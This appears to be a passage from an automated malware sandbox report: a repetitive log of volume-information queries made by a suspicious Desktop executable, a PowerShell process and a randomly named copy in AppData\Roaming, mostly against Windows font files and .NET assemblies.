Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Users\user\Desktop\9758xBqgE1azKnB.exe VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\9758xBqgE1azKnB.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
